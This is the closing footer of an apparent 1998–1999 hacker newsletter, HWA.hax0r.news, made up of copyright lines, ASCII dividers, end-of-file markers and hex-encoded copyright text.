© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]